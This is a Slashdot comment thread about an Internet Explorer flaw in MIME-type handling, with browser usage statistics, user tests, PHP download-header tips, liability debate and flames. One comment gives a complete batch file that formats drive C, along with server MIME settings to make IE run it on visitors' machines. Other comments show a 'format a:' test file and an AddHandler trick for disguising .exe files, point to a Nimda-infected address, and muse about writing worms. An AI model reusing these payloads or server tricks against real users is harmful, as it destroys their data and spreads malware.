Browser Actually Used By Slashdotters
Galeon: 1511 (3.00%)
iCab 9 (0.02%)
Konqueror 4149 (8.25%)
Lynx 6 (0.01%)
Internet Explorer 24885 (49.47%)
Mozilla 9340 (18.57%)
Netscape 3756 (7.47%)
OmniWeb 190 (0.38%)
Opera 3267 (6.50%)
Other 3187 (6.34%)
Note: Other contains browsers whose User-Agents could not be parsed. It may contain valid browsers, but for the most part is either badly formed User-Agent strings or unknown User Agents.
It has to be noted again that this data is not statistically accurate: it was taken directly off of hits, and is biased towards browsers that automatically download images (in other words, every hit counted - the values didn't take into account which hits were hits to the images linked to on the page).
Also, some other people decided to ... uh, borrow ... the mirror and so some of the links come from other sources that aren't Slashdot. I forget if I filtered those or not, but...
If anyone's interested, I suppose I could try and fix up the Perl scripts used to calculate that data. I have some pretty pie charts on my harddrive that I could put up somewhere too, although they are for the most part useless...
You are in a maze of twisty little relative jumps, all alike.
2068 is obsolete.
2616 is the current RFC for the HTTP/1.1 protocol.
A .signature, maybe. I know you're not about to expend any reputation or liability on a random post on an internet forum. I think anyone with any sense should know the same. I have no idea whether the law agrees with me.
I suppose my problem is with glrotate's phrasing. I don't see why you should be responsible for spouting off on Slashdot any more than I am just because you're in law school. I like the fact that people can hold lawyers responsible for legal advice, but that seems to me to be a "special case" in human interaction, the exchange of warranted information for a fee, not an implicit agreement I have with everyone who's looked at a law text. And despite real concerns for potentially misleading people or exposing law students to needless lawsuits, when you consider the problem from the perspective of established lawyers telling proto-lawyers not to give legal information away for free, it comes off sounding more like price fixing than like ethics.
Of course, you've got it easy. If you think lawyers have to watch shop talk outside of work, imagine what civil and mechanical engineers face in the way of liability. As one of my coolest professors put it, "When doctor screw up, one person die. When engineer screw up, thousand people dead. Everybody die!!!"
From what I've been reading on this thread everyone seems to think that this can be avoided by not choosing 'open' but the point of this security bulletin is to point out something along the lines of malicious web servers which can add something along the lines of:
AddHandler text/html .exe
into their apache config files, then allow their lil script kiddy friends to make the malicious webpages.
For example... someone adds that to their apache config, so now, apache sends the content type as text/html to IE when a .exe file is clicked. But wait... what about people who check the status at the bottom and see it's an actual .exe file that it's being linked to, not a .html file... simple... just do an:
<a href="http://mysite.com/file.exe" (javascript crap here to point to http://mysite.com/file.html)>Click here for stuff</a>
So now people think they're just visiting a harmless website... apache sends file.exe as a text/html handle and boom, IE interprets that as text/html, downloads the file, and runs it, boom no open/save dialog.
This is the security hole as I see it, IMHO anyone who chooses to open a program from an obscure location shouldn't even be using a computer because they're the bait for all the script kiddies out there... just my $.02
What does that mean, anyway? Did someone just pee on the newspaper?
--
The Cap is nigh. Time to get a fresh new account.
consider this e-mail I got from X-10 customer support, in regards to the installer for their windows 2000 version of ActiveHome, which does not run properly (it looks like a widget issue):
I have not heard of this problem before. It could be that the setup file is corrupted. (uninstallation instructions deleted) Now redownload the software. Be sure to disable any anti virus software you use on that machine. In fact, make sure no other apps are running while downloading (except IE of course). Which brings me to my next point, make sure you download thru Internet Explorer. If you use any download assistant or wizard disable it and use the default windows tool.
Call me paranoid, but that doesn't exactly give me very warm fuzzies, especially from the folks that brought us the annoying pop-under ads.
(and what the hell is the "default windows [download] tool" ?)
I downloaded the demo of HomeSeer for now, and will just end up implementing something in Perl for my X10 equipment (which I bought long before the days of the pop-under - I no longer buy their crap)
I use Mozilla for browsing and Sylpheed (http://sylpheed.good-day.net) for mail, so I guess I've already voted, so I'll use my soapbox to do a little campaigning.
My office has a loose policy of letting users use any POP3 client that they choose. Most seem to be on Outlook Express, but others use Eudora and one called "Becky!" that I think is a mainly Japanese product.
I've noticed that the HR department gets the bulk of the viruses, given their unfiltered contact with the general public, so I'll soon be setting up a special box just for them to use:
Linux, Gnome (KDE if they like,) Mozilla, Sylpheed. (Yahoo Messenger and XMMS will be on it just for fun.)
It will also get the latest release of OpenOffice, so they can look at resumes and stuff without worry. It will also have all of their standard drives mounted through Samba. It should be a fairly easy transition - sylpheed is very similar in feel to Outlook Express. OpenOffice will take a very little bit of retraining.
I agree with your point - it was very well-said. Microsoft put the customer second and because of it, they are losing a customer. Not just for Outlook, but for at least one Windows license, hopefully an office-full soon. It would sure make *my* job a lot easier.
Cheers,
Jim in Tokyo
-- My Weblog.
Let's not forget all the Opera/Konqueror etc users who identify as IE so the pages will render right ;)
I'd guess from talking to friends / people at work that it's a common practice, so probably 10+ % of the reported IE stats are really another browser.
"Theory is when you know everything but nothing works. Practice is when everything works but no one knows why. In our
Anyone thought of issuing a Class action Lawsuit on behalf of all users vs Microsoft to have them fix this problem?
If Microsoft elects to not fix the problem, then the lawsuit should make it mandatory for Microsoft to pay everyone out there with IE and Outlook for the purchase of Anti-Virus Software, Computer repairs needed for the past 2.5 years which were paid to repair machines with virii and all future anti-virus needs for any OS MS offers with IE.
*Headline News* censorship shuts down the Internet! More at 6PM!
...which means that it would still be live even if saved to disk and clicked on. It may not be run with notepad, but odds are good that one way or another it will ruin notepad...
Got time? Spend some of it coding or testing
Oh it gets even better on the next sentence... Pynnonen reported the IE vulnerability to Microsoft on Nov. 19 and recently tested the software fix at the company's request. so it's not even like MS are just saying they're developing it, the damned guy who reported it has tested it... sheesh....
There was a hole in Slashcode that allowed this to be exploited... it caused some pages to be turned into goatse.cx redirects. If you opened them in Konq (presumably any browser other than IE) it would just be text containing some HTML snippets to redirect to goatse. Some of the trolls were posting this on their user info pages, to turn Slash links into Goatse links. I believe that Taco has since fixed that one, thankfully.
Even Slashdot wants to hide some things
Copy this text, paste it into a file called imamoron.bat and stick it on your web server:
/y c:
@echo off
echo Please wait, unpacking...
format
Now tell the webserver that the MIME type for BAT files is audio/x-wav and add a link to imamoron.bat (you probably need to restart your webserver). Hit it with IE, and kiss your hard disk goodbye.
Got time? Spend some of it coding or testing
The poster seems to think he knows exactly what the hole is, but obviously doesn't, since what he described does not cause problems. I tried the following two scenarios:
IE ignoring Mime-type has ZILCH to do with OS integration. Accessing local files within a browser has been allowed on all platforms, for as long as I've touched web browsers. It used to require the file:// URL, but those are still local files, with MIME types based on extension.
What the poster also fails to realize is that Windows assigns MIME-types in the same way IE assigns MIME-types. There is no large architectural flaw.
As for the assertion that IE completely ignores MIME-types defined in a Content-type, this is not true (at least not always). If it was IE wouldn't display most CGI programs correctly, which often have either no extension, or in the case of IIS servers, the EXE extension.
Obviously this is less of a security bug and more of an obfuscation of the file type. As always, people are just unable to resist the temptation to open something "in order to have your advice".
By your logic, just clicking on a hyperlink in the first place might as well be "user intervention".
The fact is, there are some things that users are supposed to be able to do without being afraid of their system being remotely compromised and trashed! And opening a .txt file (or most types of files) of indeterminate origin, just like opening a hyperlink, is among them.
I know this will sound like I'm jumping to the wrong side of the fence, but there's one thing to say that is (marginally) in Microsoft's behalf -- while they originally "didn't consider it a problem," they *have* since reversed their position. So maybe they've been screwing over the whole world for the past fifteen years -- at least they have the guts to admit it and "start working" on a patch. ;)
Any sufficiently simple magic can be passed off as mere advanced technology.
"So what it comes down to, is I also have to mangle the output name by making it .txt_ so that IE will not try and read it, along with passing it a bad content type, otherwise if it's application/octet-stream or some such, it will STILL RENDER IT IN THE DAMN WINDOW..."
:P
;)
I had this same problem. Basically, you must make sure to pass the filename as part of the content header, but not attached to the end of the script name. This way, IE will always pop up a window asking you to save. It will tell you that it is saving your script name, but in reality, it will save the page you want it to.
First, write the page from your database to your local server as a file. Then do the following (my script is written in PHP; translate as needed.)
I wrote my database contents to a variable called $content, then executed the following code:
<?php
// reject anything but a numeric page id before it is used in a file path
if (!ctype_digit((string) $page_num)) {
    exit;
}
// put content into a file called download/$page_num.html
$fp = fopen("download/{$page_num}.html", "w");
fwrite($fp, $content);
fclose($fp);
if ($action == "download") {
    // set up file download to client
    header("Content-Type: text/unknown");   // no trailing "\n": it would end the header block early
    header("Content-Disposition: attachment; filename=\"{$page_num}.html\"");
    header("Content-Transfer-Encoding: ascii");
    $fn = fopen("download/{$page_num}.html", "r");
    fpassthru($fn);
    fclose($fn);
    unlink("download/{$page_num}.html");
    exit;
}
Note the key difference between my script and yours is the fact that I'm not passing anything but a content header to IE. Don't use your_script.php?filename=xxx... that doesn't work. Just write the filename as a variable and put that variable in the content disposition header. Also note that the Content Type can't be text/html, or, really, anything that IE will recognize.
This works in both Netscape and IE. Note that if you're working cross-platform using text files, you'll have to convert line breaks. I use the following code:
// get OS for carriage returns
if (strstr(getenv('HTTP_USER_AGENT'), 'Win')) {
    $content = str_replace("\r", "", $content);   // eregi_replace() was removed in PHP 7
}
Again, that's PHP -- translate if necessary.
Here's the final trick I'll pull out of my bag: if you set a Content Type to application/vnd-msexcel or somesuch (I could be off on that), and send the client a tab-delimited text file, it will open in Excel. Same goes for plain text and Word. It's a great trick to pull when you know your client is going to be using Windows and will say, "Hey, how did you get your script to make an Excel file? That's so cool!" (Always nice to have a little extra trick to impress your clients...
Hope this helps --
Erica
That's not what the nice salesman told me last week when I let myself be talked into buying 10 Copies of Windows 95 for my whole family, with 10 Licences of IE ...
...
So, don't ya be saying that nice salesman lied to me, Ain't nice bad talking behind a man's back
This is by far the worst article ever read on slashdot. Where is your proof? Where is the evidence? Has MS specifically said they will NOT fix this bug? Is this even a bug? Makes you wonder...
_______________________________
"I'm not Conceited...I'm just a realist..."
Agreed. Analogy: If Honda sold all Honda Accords with the same key, and didn't tell anybody, and mine got stolen, it'd be their fault. Even if recalling them would cost Honda lots of money. Because just as I could not be expected to watch my car at all times to make sure it is not stolen, I cannot be reasonably expected not to surf the 'net using the pre-installed browser. Especially if I didn't know I wasn't supposed to.
Synergy is your friend
Are you confident about that.
;^P
....
Have you ever heard of a little thing called Nimda? Are your virus definitions current? Does it scan your Internet Temporary Files automatically? Do you like to live dangerously? Why not put these little numbers in your IE browser 24.219.119.125. THIS SITE IS INFECTED WITH NIMDA, SO IF YOU USE IE AND KNOW WHAT IS GOOD FOR YOU DO NOT GO HERE
If you're a bit curious what can happen, when your virus definition is current then go here. On the Brink. You may notice that there is no pic of the download dialog box popping up, because it doesn't. This is an eml file and it is safe, right
For a laugh check out another post on this thread by me about a friend of mine who did not have current definitions for his AV.
It's forty below and I don't give a
Safe at last! Whew!
Not really, you still have to remove the Redmond Virus from your hard disk. For this, visit another site's list of download mirrors and be prepared to wait a little longer. Yes, Mozilla is included with your replacement OS.
I guess IE for Mac is already invulnerable.
Is Opera free software (that's free as in liberty, not free as in beer) yet? No? Then no thanks. I'd rather choose software that poses the least potential for biting me in the ass later on. That's free software.
Your computer is open if you stumble across a specially constructed site. If you browse /. the news, stock quotes etc. then you're pretty much safe.
Wrong, if you have a gaping security hole on your computer, then you're vulnerable (open) even if no-one exploits the hole.
The story, as posted on /. has it right.
echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
Yes - it's the default setting for Opera. You have to specifically change it, and that just causes some pages to stop working.
What kind of steps can people use to protect themselves now
:)
This step and this, for instance
May we live long and die out
I have run into the same problem using Mozilla and K-Meleon. I love Mozilla for blocking popups, but prompting me to download a file that should be displayed is annoying. Try downloading a hotmail attachment sometime.
But it's not as annoying as the moment of panic I get in MSIE when the computer appears to lock up and then I realize it's just another popup or popunder.
Of course if MS would have left "browse in a new process" as an option without doing a registry hack....Grrrrr. Some day I'll get a job in a Non-MS workplace....
"God fights on the side with the best artillery." - Napoleon, Marshal of France - speaking truth to power
Please, Microsoft may have used some competitive pressure, by making IE easier to come by then anything else. But I have trouble blaming Netscape's demise on anyone but Netscape. 4.7 was a complete piece of shit, and Netscape put out some of the buggiest, crash prone, shit ever. That's why people switched to IE, that's why I switched to IE. Because Netscape, comparatively, was a piece of crap.
autopr0n is like, down and stuff.
lynx, links, etc. browsers rely on the extension to decide which program to fork to view/run/listen to the file. Even if the browser is somehow fooled into thinking that an executable is a .jpg, it will call an *image viewer*, not execute the program. The worst thing to happen will be that the file will be useless.
MDI annoys the hell out of me, to be honest.
So, mandolin, please shut the fuck up, and take your drivel back to Redmond. We don't need you here.
> Pynnonen reported the IE vulnerability to
> Microsoft on Nov. 19
That's about 3 weeks ago. Microsoft has to reproduce the bug, fix it, test the fix, test the fix more, publish the fix. 3 weeks are not *that* much.
I bet that much open-source software has security holes open longer than that.
The next gen of virus should spread by exploiting all of MS lovely holes. Modifying CodeRed to use this exploit would be very tasty. You could have 2 excellent attack methods: attacking by scanning for open IIS servers; once found you could spread to anyone who downloads from the infected server. Once downloaded you could either email yourself out or start scanning from the download machine.
There are so many DIFFERENT holes in all of the connected products the virus's life cycle could be spread over many different stages. Let the fun begin! Thank you MS!
I mod everyone down who says "I'll get modded down for this." I hate to disappoint.
I thought it was a kind of UI standard that the middle button on a mouse opens a new window when you use it in a web browser. Konqueror, Mozilla and Netscape all do this. If your pointer is over a hyperlink at the time, then it will open the linked document in a new window. I was under the impression that Opera did this too. At least on my system, when I want to scroll, I use the scroll wheel on my mouse (which can also click and doubles as the "middle" button).
I'm using a MS Intellimouse Explorer and RedHat 7.2 if that's of any relevance.
You mention that your browser scrolls way too fast. I don't know about browsing in the Windows world, but I've realised there's a lack of ability to control how fast the wheel causes pages to scroll and different apps seem to choose by themselves (ranging from scrolling a couple of lines at a time to scrolling a page at a time). As well as choosing a standard for what the middle button does (I was sure there already was one) I think the community (developers I mean) need to agree on some way of deciding what the wheel does (on mice that have one).
Follow me
upon first reading michael's post, i thought this wouldn't work, because ie has that annoying behavior of examining the first bytes of a file to determine its mime type, sort of like apache's mime-magic module. and then ie in 5.5sp1 had to go and break the content-disposition header, but i digress.
anyway, i tried to recreate this bug, with no luck. maybe someone can explain what i'm doing wrong, assuming this is a valid hole in i.e.:
server: apache 2.0.28 beta for win32
client: ie 5.5 sp2 (not sure if it's stock sp2 or has a hotfix on top of sp2. there's some Qxxxxxx following in the "about" box)
in httpd.conf, created the following:
<Directory "c:/foo/bar">
#AddType audio/x-wav .bat
#AddType audio/x-wav .txt
AddType application/octet-stream .txt
AddType application/octet-stream .bat
</Directory>
created two files:
a.bat:
@echo off
format a:
b.txt:
this is a just an .exe renamed to b.txt
ie renders the .bat file as text in the browser.
in the case of the .txt, ie prompts to open or save, defaulting to save. selecting open opens the binary file in notepad.
changing the mime-type to audio-x-wav just renders the files as text in the browser (no prompting in the case of the txt/exe).
so what's the big deal?
I really don't care about the security issue (well I do but that's not the point).
The whole download file process in IE is screwed up.
Say you want to allow users to download a generated file that is to be saved as "report.zip". The good way to do it is to have a cgi or asp or whatever generate the file on the fly and send them to the user.
Now HTTP has default headers for this exactly this. Guess which browser doesn't do what you tell it and has a different behaviour for each and every version.
I develop software for a living...
When I serve this URL up to IE 6 under Windows 2000 (maybe other versions; that was the only Windows IE I tried)
Parse error...
These 2 lines are soooooo incompatible as to be ridiculous.
You *only* test on beta software (IE6) ?!?
And you do this for a living?!?
This article is complete crap. I tested it, myself, and it simply isn't true.
A quick edit of my mime.types file in apache, and .exe files are now sent as text/plain. When I type in the URL http://autopr0n.com/cliplay.exe, Internet Explorer does indeed handle it the same way it would handle executable content. It asks if I would like to download or execute it. Hardly much of a fucking security issue if you ask me, especially considering the fact that it would behave in the exact same manner if the mime type was application/octet-stream or whatever the default value was.
In other words, the mime type has no effect on how IE handles executable content. But if this were a problem, it would mean that IE automatically ran all executable content it received, including stuff with the proper mime header. You would know this too if you stopped to think about it for half a second.
Oh, and mozilla does the exact same thing (well, it doesn't give you the option to execute from the cache like IE does). At least in the somewhat older version I have.
You guys couldn't take five fucking minutes to test this before posting this crap story?
Oh wait, it was from michael... nevermind. Anyone else remember the united devices fiasco a while back where michael attacked some anti-cancer distributed software because it was being funded by 'corporations' (Intel) who would of course patent everything and make money off everyone's spare cycles (despite the fact that it was clearly stated on the site that it wouldn't be). Couldn't be bothered to check sources or verify anything before posting a story to millions. And it's the same here. Way to fucking go Mr. 'journalist'
autopr0n is like, down and stuff.
For all the fanboys that scream out that Opera is better than IE (and it is, I love it too) - in this case it is vulnerable too, as this link proves. The file save dialogue will show the text.txt filename, but if you select to open it directly, it will run.
Opera 6.0 is not vulnerable - but take note - even though it is much better and has less exploits than IE, it's still not completely free of them. (On the other hand, the only secure applications are those on an unpowered computer, or a program of 'Hello World' complexity)
What happens if you send an .exe file with an audio/x-wav mime type is that IE will handle it like any other .exe file it runs across. It'll give you the option to save or run it, as an EXE. In other words, the mime type is pretty much ignored.
autopr0n is like, down and stuff.
If you try that on a windows machine, make sure you don't have .bat files set as server side executables.
you'd be just as likely to kill your server's hard drive while the user got a nice web page that said "please wait, unpacking..."
autopr0n is like, down and stuff.
On Windows, create a separate user account for the browser with no access to any important files, and use "runas" to start the browser.
For IE:
%windir%\System32\runas.exe /user:ie /profile "c:\program files\internet explorer\iexplore.exe"
For Mozilla:
C:\WINNT\system32\runas.exe /user:mozilla /profile C:\Mozilla\bin\mozilla.exe
"Slapping people is fun." - Starla Grady
Nope. Tried it on IE6.0 and IE informs me that the file is of an unknown format or corrupted.
---
I didn't want to leave this space blank.
URL: http://autopr0n.com/cliplay.exe
Mime type: audio/x-wav
Action: Opens up media player and says "cannot play back, format not supported"
In other words, you're completely full of shit. And so is the person who posted this bogus article in the first place.
autopr0n is like, down and stuff.
>Actually, Slashdot has way more Windows apologizers than it used to. And this is a bad thing.
Apologists? Get stuffed. How about rational and clear-headed. Like being able to spot reverse FUD in action. Again, you are another /.er with an agenda to push. I've said it before, I'll say it again. I don't come here to fucking push a one-sided agenda, and I think that the so-called apologists are just geeks looking for some JOURNALISTIC INTEGRITY. If the low UIDs and zealots want to keep the blinders on and circle jerk all the way to non-MS heaven so be it. This board seems to be evolving away from that, thank god. There are some of us who recognise flaws and strengths with many different apps and OSes and are WILLING TO TELL THE FUCKING TRUTH.
Yes this "feature" is a security risk. Yes it is serious. And YES, the tone of Michael's comments border on tabloidism. And YES, I think it is appropriate that the patrons of this board be able to point that fact out and demand a little bit of non-partisan behaviour from the editors.
Wow. Never expected this reaction on slashdot. :)
Error: PANTS NOT FOUND. Press <F1> to continue.
"The patch for Internet Explorer (IE) is currently in testing and could be released soon, according to Jouko Pynnonen, a security researcher with Finland's Oy Online Solutions. Pynnonen reported the IE vulnerability to Microsoft on Nov. 19 and recently tested the software fix at the company's request. "
Correct me if I am wrong, but that doesn't sound like M$ refusing to fix the bug or not fixing it to me...
People should not be afraid of their governments - Governments should be afraid of their people.
Oops sorry without the link this does look like a troll :-(
Obviously some of you didn't read that /. story
"What kind of steps can people use to protect themselves now"
Never ever choose "open file from its current location" no matter what you think the name is, unless you are willing to trust the site with any data on your system.
Of course, since no data has been released, I'm not sure this fixes all the problems, but from the description in the article it would. (Somewhere above someone says that IE executes certain MIME types, namely audio, automatically. However, AFAIK, in that case it would attempt to use the correct plugin, and this vulnerability would not apply).
I don't think this will do major damage. There seems to be a real easy workaround. I think michael is blowing things a bit out of proportion in his article. On the other hand, I do agree that this is a perfect example of how Microsoft's refusal to divulge information has nothing to do with protecting customers. Sure there is no "patch" for the vulnerability yet. But NONE IS NEEDED! In no case is any legitimate usage made impossible (check me on this--Microsoft may have implemented some stupid "copy protection" where you can only open a file but not save it). It is only made less convenient. Users can be protected the instant they see the alert, Black Hats will take time to set up an exploit even if tools are made easily available.
URL: http://autopr0n.com/random.txt
Mime type: application/octet-stream
Actual type: text file
Action: shows up in IE as a regular text file.
Now, when you take a real .exe file, rename it to .txt, and then send it as application/octet-stream IE will prompt to download/open, and if you click open it will open it in notepad. For example
URL: http://autopr0n.com/random.txt
Mime type: application/octet-stream
Actual type: win32 executable (shows you how long your computer has been running, actually)
autopr0n is like, down and stuff.
The grand parent post is incorrect, and the one I'm replying to is correct.
Mod this one up at least to the same rating as "Intergating Web Browser and File Browser"
-- don't discount flying pigs until you have good air defense
All you need to do is find a country where the EULA cant take away the right of negligence
Wouldn't it be nice if schools got all the money they wanted and the army had to hold jumble sales for guns
Sorry, the second URL should be http://autopr0n.com/uptime.txt
autopr0n is like, down and stuff.
I don't really think the EEF is going to go around lobbying for more restrictions on programmers.
autopr0n is like, down and stuff.
First of all: Test what? Details of the bug have not been released. So only your own arrogance validates your "test" of this bug.
Second of all: The harm in this bug lies in IE asking the user if he wants to open a file of one type (i.e. Text, which is safe), and then proceeding to run malicious code.
Now this bug may not pose any threat to reasonably intelligent people, but I think we all know that the internet (and IE users even more so) is not comprised solely of reasonably intelligent people. Hell, it might even get me, if I was an IE user. Why waste time/space downloading a txt file when I can open it in the browser? Trust issues? Who worries about whether or not to trust a txt file? Text is harmless, as long as it's treated as text.
Nothing to see here. Move along.
Sheesh! Stop already.
The problem here arises from the fact that Windows allows more than one '.' in a filename, but will only display one. Therefore, a malicious webmaster can name a file "foo.pdf.exe" and Windows Open/Save dialog will only display foo.pdf.
Windows, by default, does not show the actual file extension. The 'actual' file extension is the last one. You can have as many '.'s in your file name, and the last one won't be shown if file extensions are turned off (not 'just one')
If you turn file extensions on its not a problem.
*sigh* is it to much to ask that people actually know what they're talking about?
autopr0n is like, down and stuff.
That's true, but implied warranties make the assumption that the product is going to be as good as others on the market. And we all know, or at least have our stereotypes about the software market.
So in the end, software has no implied warranties, because no one can reasonably expect that it won't be bug/security issue free.
autopr0n is like, down and stuff.
Warning to consumers: Although it sounds like a good thing, "Standards-compliant", when used in the context of Mozilla, is a euphemism for "Fails to render a significant proportion of popular websites".
-- the most controversial site on the Web
Let me say I will be one of the first to jump on the "I Hate Microsoft" wagons. But this article is just plain wrong, as in inaccurate.
The first paragraph of the referenced story talks about how they are currently in testing for this security hole. Whereas, the poster is stating that Microsoft has no specific designs on when this will ever get fixed.
Inaccurate, Fanatical Extremism like this is only going to hurt Open Source, Slashdot, and those associated with it. While Microsoft may be wrong in this case. It doesn't do us any good to exhibit poor sportsmanship. Leave that for the politicians
"the beta test"
I agree it is a bug in the OS. It is Matrox video cards. The problem is that, in some cases, Opera takes memory and doesn't give it back. There is a huge memory leak somewhere, it seems, that has been there for more than a year.
Bush's education improvements were
sent an EXE as an audio file. It was automatically downloaded and I got an error message saying that it was an invalid audio file.
Sending an .txt file with a win32 program file in it (renamed .exe) and it will ask you if you want to open or save or whatever. If you click 'open' it opens in notepad. Weirdly, a regular text file sent with a mime type saying that it's an executable will just show up as a regular text file.
I'm using IE6, though. And some comments seem to be saying this only affects IE5. So who knows. I've posted URLs for my experiments on slashdot, here, here, and here
autopr0n is like, down and stuff.
First of all: Test what? Details of the bug have not been released. So only your own arrogance validates your "test" of this bug.
What details are you talking about? They are all spelled out clearly in the article. Change the mime type of an EXE and it gets run. Only it doesn't. I've tried it both ways (having an .exe with some other mime type with an external viewer, and having an .exe renamed to .txt and sent as an executable). The program never ran.
autopr0n is like, down and stuff.
Not entirely; as I understand it, Konqueror and Explorer work in pretty much the same way, e.g. the HTML rendering is taken care of by a separate library/DLL, that is available for use by any application.
When I set IE to warn about cookies once, SQL Server Enterprise Manager later warned me about a cookie when I was browsing the db I was administering (this was about 2 years ago now).
Cheers,
Tim
It's official. Most of you are morons.
Actually this is probably a symptom of the most irritating thing about IE from a development standpoint. With NS or anything else you can have many versions installed on one machine, with IE I haven't found a way of installing multiple versions (I don't believe there is one due to integration with the OS) hence you need multiple systems to test with multiple browsers before you even start testing with multiple OS.
I've had a similar problem trying to pipe a pdf through an access rights system, the fix was to hack an extra parameter onto the end of the URL so you end up with something like
http://abc.def.ghi/dostuff?zxy=123&x=x.pdf
which is horrible, but works.
Cars' steering wheels are also free when you buy a car. Lets remove them.
Nah, bad example.
A MS car would have somehow linked the stereo system to the car's engine, so if you remove the stereo system the car would not start. Needless to say the MS stereo plays only copy protected, MS sanctioned square CDs and the only way to use another stereo is to install it somewhere else in the car. Much better analogy.
IANAL but write like a drunk one.
I can't help but wonder if we'd have a software industry left if developers became completely liable to the individual for lousy products. How does one prove that his program fails because Windows sucks? How does Microsoft prove that Windows sucks because hardware manufacturers write crappy drivers for inconsistent peripheral interfaces? How could Free Software survive in an environment where it is still impossible to write once, run anywhere?
There is a middle ground, I'm sure, but we're not going to get there as long as software developers are the only ones writing the rules regarding liability for faulty software development.
Try not. Do or do not, there is no try.
-- Dr. Spock, stardate 2822-3.
"Microsoft doesn't audit their software because *IT ISN'T COST EFFECTIVE YET*. Not until people demand security will MS start doing this. It hasn't happened yet."
I agree that Microsoft does not audit their software. That seems obvious.
Yes, Microsoft has more to audit, but they have more full-time programmers, too.
What you are basically saying is that Microsoft doesn't care about being trustworthy, they care only about money.
I never would have guessed that Open Source software would replace the software from a giant company, but that will continue happening if Microsoft does not care for its customers.
Bush's education improvements were
Courtesy of The Register
The article tells you how to download and install a DLL that turns off HTML in M$ Lookout
Anyone quoted by a reporter knows how little they understand
Don't believe what you read is the truth.
with IE I haven't found a way of installing multiple versions
Ouch!
I usually test it with NS and IE (various versions) on a Mac and NS and IE on the other monitor under VirtualPC under a few versions of windows.
I ask friends running a whole grip of different combos to look at it too before I release it.
IE 6 is NOT beta software, and if you took your head out of your arse, you would know it.
So, according to the slashdot people, I should switch to Netscape/mozilla. another wanna-be monopolist. Guess I'll have to take this for granted:
- Default startup with TWO error msgboxen !! (nerdscape .lock file found ANd cannot locate server register)
.. which made me really really angry once, resulting in a thrashed keyboard. Can I get a refund on that?
- Mysteriously disappears from the desktop from time to time -though ps reveals its still running
- If a page is not found, the error is 'cannot locate keyword.nerdscape.com'
talking about crappy browsers!! I found IE on solaris more stable than nerdscape (except for outlook)
BTW I still have a three-year old html script that will instantly crash any netscape browser up to the latest mozilla. I'll be working on the 'vanished netscape instance exploit' from now on!!
It's been released for what, like a week?
That *is* still beta regardless if it's from MS or not.
I had a similar problem once, when I had to make a CGI that would send back a spreadsheet to be passed off to the right application from either Netscape or IE. The eventual solution was to change the content-type slightly for each browser, and for IE to append a fake parameter with the right extension so IE would open it correctly.
It was a workaround for IE, really, Netscape handled it fine with the correct content-type. IE didn't handle it correctly unless you munged the content-type AND added that fake extension...
- Give a man a fire and he's warm for a day, but set him on fire and he's warm for the rest of his life.
Well why doesnt someone setup a page that uses this exploit... hmmm... :
Difficult bits:
- gain access to msn.com
Easy bit:
- Code a virus (some may say saviour?) that:
uninstalls IE
installs Mozilla
sets slashdot as homepage.
Hmm now im sure M$ would fix the bug quick enough if that was done!
The effects of joining #*,0 are server side. Client independent.
This is a great quote! Mod it up please!
If I were M$ I wouldn't write a patch either.
I would write a new and more expensive OS without the 'feature'. Thereby forcing all the users to upgrade.
And actually, it might be cheaper for M$ to do instead of writing a patch.
Privacy is terrorism.
It's been out for months.
This is all so confusing. Is this the same as the Microsoft bug(s) that I read about last week? Or is this a spiffy brand new Microsoft bug?
This brings security through obscurity to a new level! Not only are all of the bugs obscure, but there are so impossibly many of them lately, that no mere mortal can keep track any more. Is there a patch for this or was it applied already last week? Is this one brand new and is there a patch hiding somewhere in MSN that nobody knows about yet? What is about to come next week? Or has Microsoft just given up!?
Did you consider that maybe he was testing & debugging small pieces (maybe to make sure the app logic was right?) before testing everything more thoroughly?
I have been stung by this too.
The MS Update page downloads a CSV dataset and renders it. The MS javascript on that page would get confused by the fact that the CSV data that I was downloading and was marked as text/html would be modified (validly) by our application. Since we added HTML to the CSV data since we treated it as text/html it would get confused.
I have an outstanding support request with MS, but they tried to convince me that since under IE it works normally it was not a bug.
I have a write up at http://www.ticons.com.au/~mtippett/msdownload.txt if anyone wants to annoy microsoft with their own bugs!
We lost a customer because of it, so give them hell!
..just felt like commenting on your sig. This may not save time with certain harddisks; the firmware on some disks tries to read the partition table when it powers up. The command above would fuck up the partition table and will cause weird errors. mkreiserfs /dev/hda? may save some more time:)
I use balsa for email.
I use gmc (not nautilus yet) for file browsing.
Why do these three tasks always have to be made into one huge application that has to take over your computer?
Man, I'm sitting in my high school right now using IE 5.0 because that's what the computers in my school shipped with, and our one computer tech doesn't have the time to install a new browser on all the comps, and train the clueless teachers and students in their use. And frankly, why should my school have to lose security because of this? It's microsoft's job to ship a quality product (in theory), and they aren't doing that. It isn't the victim's fault.
I'm the stranger...posting to
I would like to demonstrate this. Could someone write a HTML document for me that will do something harmless yet dramatic, like shut down the computer? Then email me the link. This way we can all use your HTML to show people what this bug does. A picture is worth a thousand words, but a demonstration HTML would be worth a bunch more Micro$oft systems converted to Linux or Unix.
. Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
I have been unable to get this to work as described in the article, or by the other attempts posted so far. The closest I have come is to create a Redirect or Rewrite rule that takes a request for a *.txt file and points it to a .bat file (thereby fulfilling the "text" requirement), which is then soft linked to your malicious executable. This still displays the file's name however. And the dialogue asks you to "run" this program. The extra step of the soft-link bypasses a warning about running the file; if the redirect went straight to the .exe, the browser will complain about security.
Either way, this is entirely server-side. The article states that simple HTML can pull it off. I am wondering if that is just a smoke screen.
1) I have tried renaming an .exe file to .txt, that just spits binary data at you in Notepad.
2) I tried a cgi (source is here).
Now, this time the dialogue displays the requested file (.cgi) instead of the executable filename (not a redirect). However, you are then prompted to "choose a program to run this..." which means that the requested file has to have an executable extension, or a known extension. Wav, mp3, mpg won't work as the format is obviously invalid.
3) I tried messing with the mime.types in Apache, various soft links and combos of all 3 methods. Basically I fail to see how standard HTML without any server-side config or scripting can fool the browser or get it to exec code unwillingly, as described in the article.
Maybe if I renamed the file to mayIhaveyouradvice.txt.pif or something, but the extension IS displayed to the user. Maybe the average user doesn't pay attention, but it's kind of hard to miss.
Obviously they have omitted something crucial because (my box - W2K, IE 5.5 SP2) this "bug" is not happening, and it's not happening for other people too. If this is so easy to implement in plain HTML and would affect "millions" then I think other /.ers would have hit on it by now.
Microsoft has long tried to subvert MIME. In particular, as noted, MIME type is used to determine how to handle a document or attachment, but extension is used to actually handle it. For kicks, try opening a mime type AUDIO/basic document. The most basic possible audio encoding pulls up an error message.
--G
I think you missed just one little thing in this particular example.
